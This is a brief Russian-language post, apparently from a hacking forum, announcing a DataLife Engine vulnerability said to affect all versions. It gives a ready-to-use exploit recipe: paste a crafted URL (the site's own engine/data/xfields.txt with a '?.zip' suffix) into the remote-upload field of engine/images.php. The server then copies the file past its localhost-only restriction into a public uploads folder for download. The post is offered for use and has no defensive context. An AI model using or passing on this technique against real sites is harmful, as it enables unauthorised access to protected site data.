DLE уязвимость работает на версиях: ВСЕ DLE
Уровень риска: Низкая
Нашёл очередной баг: Lion__
В папке data, стоит ограничение на локальный доступ (Allow from 127.0.0.1), из-за этого просто считать файл не получится, но есть простой способ:
Пускай наш сайт будет - bugsite
1) Переходим по ссылке: http://bugsite/engine/images.php
2) В строчку "С сервера (URL):" Вставляем строку:
http://bugsite/engine/data/xfields.txt?.zip
Всё, файл залит в папку uploads/files/ теперь просто скачиваем)